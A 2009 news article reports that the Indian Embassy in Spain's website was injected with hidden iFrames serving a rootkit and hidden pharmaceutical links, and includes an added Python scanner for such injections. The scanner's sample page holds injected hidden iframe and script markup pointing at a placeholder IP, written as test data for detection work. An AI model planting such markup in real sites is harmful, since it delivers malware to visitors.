Softpedia

January 30th, 2009, 11:07 GMT

The Embassy of India in Spain Pushes Malware via Website

[Image: The National Emblem of India]
The website of the Embassy of India in Spain (Embajada de la India en España) has been compromised by attackers who injected malware-serving code into its pages, security researchers warn. The malicious binary being served contains a rootkit component that attaches itself to the svchost.exe process.

Initially reported by Ismael Valenzuela and further dissected by independent security consultant Dancho Danchev, the attack on the website of the Indian Embassy in Spain involves a rogue iFrame that pushes the malicious binary to visitors when the page loads.

“Interestingly, the malicious attackers centralized the campaign by parking the three iFrames at the same IP,” notes Mr. Danchev, who also points out that many domains hosted on the same IP have been involved in iFrame attacks since August 2008 and are registered to the same person.

Security researchers from antivirus vendor Trend Micro have also analyzed the attack and concluded that it might indeed be part of a larger-scale iFrame injection campaign. They also found rogue code inserted into the header of the embassy's website, consistent with previously documented incidents.

The additional rogue code points to other pages that display various pharmaceutical content, leading Trend Micro Advanced Threats Analyst Ryan Flores to conclude that the attackers also employ black-hat search engine optimization techniques. “This is possibly an SEO poisoning scheme, or a plot to use the legitimate domains of the compromised websites to evade spam filters,” noted Flores.
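The two indicators the researchers describe, injected frames and scripts that point back to a single bare IP (Danchev's centralization observation) and hidden off-site pharmaceutical links in the page header (Flores's SEO poisoning theory), are both visible in the page's HTML and can be checked for mechanically. The Python script below is an added example, not code from the article or from any of the researchers quoted; it walks a page with the standard-library HTML parser, flags iframes and scripts that are hidden, tiny, placed in the head or sourced from a bare IP, flags off-site links that are hidden or carry pharmaceutical keywords, and groups the hits by host so a shared address stands out. The sample page, the hostnames and the address 198.51.100.23 (a documentation range) are constructed placeholders and have nothing to do with the real incident.

```python
import ipaddress
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not the embassy's real HTML): a hidden 1x1 iframe and
# a script injected into <head>, both pointing at one bare IP, plus a hidden block
# of pharmaceutical links. 198.51.100.23 and pharma.example.net are placeholders.
SAMPLE_PAGE = """<html><head><title>Embassy of India</title>
<iframe src="http://198.51.100.23/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
<script src="http://198.51.100.23/load.js"></script>
</head><body>
<h1>Consular services</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<div style="display:none"><a href="http://pharma.example.net/buy">cheap viagra</a>
<a href="http://pharma.example.net/cialis">order here</a></div>
</body></html>"""

PHARMA_TERMS = re.compile(r"viagra|cialis|levitra|pharmac|tramadol|xanax", re.I)


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _dim(value):
    """Parse '1', '1px', '0' to an int; anything unparsable counts as large."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else 10**6


class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.in_head = False
        self.hidden_stack = []    # open elements styled display:none / visibility:hidden
        self.current_link = None  # finding under construction while inside an <a>
        self.findings = []

    def _off_site(self, host):
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if tag == "head":
            self.in_head = True
        if hidden:
            self.hidden_stack.append(tag)
        if tag in ("iframe", "script") and a.get("src"):
            host = (urlparse(a["src"]).hostname or "").lower()
            reasons = []
            if tag == "iframe" and self.in_head:
                reasons.append("iframe in <head>")
            if tag == "iframe" and max(_dim(a.get("width")), _dim(a.get("height"))) <= 1:
                reasons.append("1x1 or smaller")
            if hidden or self.hidden_stack:
                reasons.append("hidden by CSS")
            if _is_ip(host):
                reasons.append("src is a bare IP")
            if reasons:
                self.findings.append({"kind": tag, "src": a["src"], "host": host, "reasons": reasons})
        elif tag == "a":
            href = a.get("href") or ""
            self.current_link = {"kind": "link", "src": href, "text": "",
                                 "host": (urlparse(href).hostname or "").lower(),
                                 "reasons": ["hidden by CSS"] if self.hidden_stack else []}

    def handle_data(self, data):
        if self.current_link is not None:
            self.current_link["text"] += data

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False
        if self.hidden_stack and self.hidden_stack[-1] == tag:
            self.hidden_stack.pop()
        if tag == "a" and self.current_link is not None:
            link, self.current_link = self.current_link, None
            if PHARMA_TERMS.search(link["src"] + " " + link["text"]):
                link["reasons"].append("pharmaceutical keyword")
            # Only off-site links count: hidden on-site navigation is common and benign.
            if link["reasons"] and self._off_site(link["host"]):
                self.findings.append(link)


def scan(html, site_host):
    """Return the suspicious iframes, scripts and links found in one page."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings


def group_by_host(findings):
    """Group flagged references by host: several injections sharing one address
    is the centralization pattern Danchev describes."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f["src"])
    return dict(by_host)
```

Running `scan(SAMPLE_PAGE, "embassy.example")` on the constructed page returns four findings (the head iframe with all four reasons, the script because of its bare-IP source, and the two hidden pharma links) while the legitimately sized YouTube embed passes; `group_by_host` then shows both injected references under 198.51.100.23. On a real site the same scanner would be run over every page, with the site's own hostname passed in so that internal links are never flagged.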

Paul O Baccas, malware analyst at Sophos, also confirmed the attack and noted that the websites of other diplomatic missions have been compromised in the past, including the U.S. Consulate in St. Petersburg, the French Embassy in Libya, the Syrian Embassy in London, the Dutch Embassy in Moscow and the Embassy of Brazil in India.

Another Trend Micro researcher, Edgardo Diaz, Jr., notes that parts of this attack are not yet active, possibly indicating an advertising scam that has not been fully deployed. He warns, however, that it would take only a few modifications on the attackers' part to turn this into a very serious threat.

The malware distributed via the compromised embassy website is detected as BKDR_TDSS.CG by Trend Micro and Mal/IFrame-F by Sophos.
